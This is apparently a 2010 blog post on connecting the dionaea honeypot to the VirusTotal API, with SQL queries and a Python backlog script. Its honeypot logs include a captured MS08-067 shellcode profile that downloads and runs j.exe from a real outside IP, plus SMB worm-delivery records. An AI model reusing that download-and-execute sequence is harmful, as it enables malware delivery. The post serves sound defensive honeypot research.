virustotal api

I've been messing with virustotal some time ago, and at that point of time you had to scape the html output. Things have changed, virustotal offers a free http api to interface with their services, all you have to do is sign up and get the api key which is hidden deep in the web2.0 interface.

Using the api, you have get_file_report, scan_file and make_comment.

dionaea

If we receive a new file, we have to check if the file is known to virustotal yet, which is done by calling get_file_report, the json encoded resultset will indicate if the file was known, for known files, we are done now.
If the file was unknown, we submit the file using scan_file, once the file is uploaded, we wait 60 seconds and post a rather useless but self advertising comment this file was gathered by the dionaea honeypot. Then, we have to wait for the file to be analyzed by virustotal by polling the files result with get_file_report.

While the api imposes a limit of max 20 calls in 5 minutes, the initial version of the code dionaea used to submit files to virustotal simply ignored this limit, and it ignored the result returned by virustotal. As the information returned by virustotal is rather interesting, I decided to allow dionaea to store the information and associate it with the other data gathered for the attacks, namely, the data returned by virustotal is stored in the sqlite database now. And, as I wanted virustotal to process all my backlog of files dionaea gathered so far, I wanted it to be able to honor the 20/5 api call limit virustotal imposes.

So, dionaea's virustotal code maintains a cache of outstanding virustotal operations for all files lacking virustotal informations. This cache is a sqlite3 database, and we process one item per 20 seconds from this cache.

readlogsql

logsql stores the final information in the logsql.sqlite database and you can use readlogsqltree to get a readable representation of the information received.

2010-10-07 02:50:23
  connection 483162 smbd tcp accept 93.218.68.29:445 <- 194.170.206.5:16240 (483162 None)
   dcerpc bind: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) transfersyntax 6cb71c2c-9812-4540-0100-000000000000
   dcerpc bind: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 27 (OpenSCManagerA ())
   dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 0 (CloseServiceHandle ())
   dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 27 (OpenSCManagerA ())
   dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 24 (CreateServiceA ())
   dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 0 (CloseServiceHandle ())
   dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 27 (OpenSCManagerA ())
   profile: []
   offer: smb://194.170.206.5/csrss.exe
   download: 12fb7332920a7797c2d02df29b57c640 smb://194.170.206.5
     virustotal 2010-08-30 14:06:38 39/43 (91%) http://www.virustotal.com/file-scan/report.html?id=c7247d162cf720c07979946afd01b6b1907db9a4be6916a3a6be268993638fee-1283169998
       names 'Downloader' 'Downloader.Generic' 'Email-Worm.Win32.Atak' 'Email-Worm.Win32.Atak!IK' 'Generic Worm' 'Heuristic.BehavesLike.Win32.Proxy.H' 'Medium Risk Malware' 'PSW.Agent.AHCN' 'TR/Agent.mtv' 'Troj/Brambul-A' 'TrojWare.Win32.Agent.mtv0' 'Trojan' 'Trojan-Spy.Win32.Agent.bazy' 'Trojan-Spy.Win32.Agent.bbel' 'Trojan-Spy/W32.Agent.57344.KT' 'Trojan.Win32.Generic!BT' 'Trojan.Win32.Generic.51EEB62C' 'Trojan/Spy.Agent.bbel' 'Trojan/Win32.Agent.gen' 'Trojan:Win32/Brambul.A' 'TrojanSpy.Agent.QBIR' 'TrojanSpy.Agent.bbel' 'TrojanSpy.Agent.mza' 'W32/Bagz.gen@MM' 'W32/EMailWorm.DUT' 'W32/Trojan2.KEXN' 'WORM_MYDOOM.DA' 'Win-Trojan/Agent.57344.XY' 'Win32.HLLW.Bumble' 'Win32.TRAgent.Mtv' 'Win32/Pepex.E' 'Win32/Tnega.WW' 'Win32:Rootkit-gen' 'Worm.Generic.241160' 

You get the detection rate, the link for the virustotal report and the names the different av companies assigned to the threat. As CME was abandoned, the only way to get a reasonable number of names is gathering files with low detection rates:

2010-10-06 19:16:07
  connection 482728 smbd tcp accept 93.218.68.209:445 <- 93.81.169.153:3132 (482728 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
   profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://208.53.183.171/j.exe', '83.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['83.exe', '895'], 'call': 'WinExec'}, {'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
   offer: http://208.53.183.171/j.exe
   download: c9e5edea5f4f1b2c7ea6a3d15a9450f7 http://208.53.183.171/j.exe
     virustotal 2010-10-05 20:49:20 0/43 (0%) http://www.virustotal.com/file-scan/report.html?id=3819100edd956200aa65ce6dceb3fd07414f180e624fdb1979bb13c8b3019d0c-1286304560
       names 

In this case there was no detection, but if you click on the link virustotal links a more recent analysis of the file, where 14 of 42 scanners detected the threat.

sqlite3

Given the data is available in a sqlite database, it is rather easy to query …

example #1

SELECT
	COUNT(virustotalscan_result), virustotalscan_result
FROM
	virustotalscans
	NATURAL JOIN virustotalscans
WHERE
	virustotal IN (SELECT DISTINCT virustotal FROM virustotalscans WHERE virustotalscan_result LIKE '%Conficker%')
GROUP BY 
	virustotalscan_result
ORDER BY
	COUNT(virustotalscan_result) DESC;

Get all names for Conficker - if one scanner claims it is Conficker, we assume all other names are aliases for Conficker.

countname
8900Win32.Worm.Downadup.Gen
6894W32/Conficker!Generic
5797WORM_DOWNAD.AD
3870Net-Worm.Win32.Kido.ih
3721Mal/Conficker-A
3666W32/Conficker.worm.gen.a
3605W32/Conficker.C.worm
3423W32.Downadup.B
3388Win32:Confi

example #2

SELECT
	COUNT(DISTINCT virustotalscan_result), virustotalscan_scanner
FROM
	virustotalscans
	NATURAL JOIN virustotalscans
WHERE
	virustotal IN (SELECT DISTINCT virustotal FROM virustotalscans WHERE virustotalscan_result LIKE '%Conficker%')
GROUP BY 
	virustotalscan_scanner
ORDER BY
	COUNT(DISTINCT virustotalscan_result) DESC;

Signature quality, how many signatures do scanners have for Conficker.

countscanner
1445nProtect
592McAfee-GW-Edition
558Jiangmin
463McAfee
456McAfee+Artemis
330ViRobot
270Rising
260ClamAV

example #3

SELECT 
	download_md5_hash, 
	COUNT(DISTINCT dcerpcserviceop_vuln) AS vulncnt,
	MAX(dcerpcserviceop_vuln) AS maxvuln,
	COUNT(download_md5_hash) AS numdls
FROM
	virustotalscans
	NATURAL JOIN virustotals
	JOIN downloads ON(download_md5_hash = virustotal_md5_hash)
	NATURAL JOIN connections
	NATURAL JOIN dcerpcrequests
	JOIN dcerpcservices ON(dcerpcrequest_uuid = dcerpcservice_uuid)
	JOIN dcerpcserviceops ON (dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice AND dcerpcserviceop_opnum = dcerpcrequest_opnum)
WHERE
	virustotalscan_scanner = 'Kaspersky'
	AND virustotalscan_result IS NULL
	AND dcerpcserviceop_vuln IS NOT NULL
	AND dcerpcserviceop_vuln != ''
GROUP BY
	download_md5_hash
ORDER BY
	COUNT(download_md5_hash) DESC;

Query all samples gatherd via smb bugs and the vulnerability used which are not detected by Kaspersky.

md5sum number of vulns example vuln downloads
3498bcd9d0f5f94575f7b4e78d1b337d1MS08-676
3ae47280a0008814efef0e9f236f18001MS08-674
7c5b64d771e0f205e3884c3fcf361a8b1MS08-674
3de40bad3d1409376ad77077159707bb1MS08-673
2b40f52664bda0565f6c2c6016c50cad1MS08-672
53979f1820886f089a75689ed15ecf6e1MS08-672

processing backlog

As this is quite new code, and dionaea only queries new files, you won't get any virustotal results for all the files you gathered so far by default. By default means, this can be changed.
We can simply store all files you received so far in the already mentioned virustotal cache file, and dionaea will process all your backlog. Due to the api limit of 20 requests in 5 minutes, where dionaea does one request all 20 seconds, this will take some time.

#!/opt/dionaea/bin/python3
 
import sqlite3
 
lsqld = sqlite3.connect('/opt/dionaea/var/dionaea/logsql.sqlite')
lsqlc = lsqld.cursor()
 
r = lsqlc.execute("""SELECT 
	download_md5_hash 
FROM 
	downloads 
	LEFT OUTER JOIN virustotals ON (virustotal_md5_hash = download_md5_hash)
WHERE 
	virustotal_md5_hash IS NULL
GROUP BY 
	download_md5_hash 
ORDER BY 
	COUNT(*) DESC;""")
 
vtd = sqlite3.connect('/opt/dionaea/var/dionaea/vtcache.sqlite')
vtc = vtd.cursor()
 
for i in r:
	vtc.execute("INSERT INTO backlogfiles (status,md5_hash,path,timestamp) VALUES ('new',?,?,strftime('%s','now'))", (
		i[0], '/opt/dionaea/var/dionaea/binaries/' + i[0]) )
 
vtd.commit()

You can check the status from time to time:
sqlite3 /opt/dionaea/var/dionaea/vtcache.sqlite

SELECT count(*) FROM backlogfiles;

get number of pending files

SELECT * FROM backlogfiles WHERE STATUS != 'new';

get files which are in processing

As dionaea currently does not deal with virustotal server or connection errors gracefully, sometimes files get stuck, you can revive them using:

UPDATE backlogfiles SET STATUS = 'comment' WHERE STATUS = 'comment-';
UPDATE backlogfiles SET STATUS = 'new' WHERE STATUS = 'new-';
UPDATE backlogfiles SET STATUS = 'query' WHERE STATUS = 'query-';

And for some files, virustotal does not work at all, in my case I was unable to submit some files, d320d802a407da14a77e809329de31cc for example.

Comments

1

[…] 2010:10:07:virustotal_api [carnivore news] […]

2010/10/07 15:52
2

[…] new integration with VirusTotal&#8217;s api […]

2010/10/16 16:10
3

[…] carnivore.it […]

2011/01/13 21:18


2010/10/07/virustotal_api.txt · Last modified: 2010/10/07 15:08 by common
chimeric.de = chi`s home Creative Commons License Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0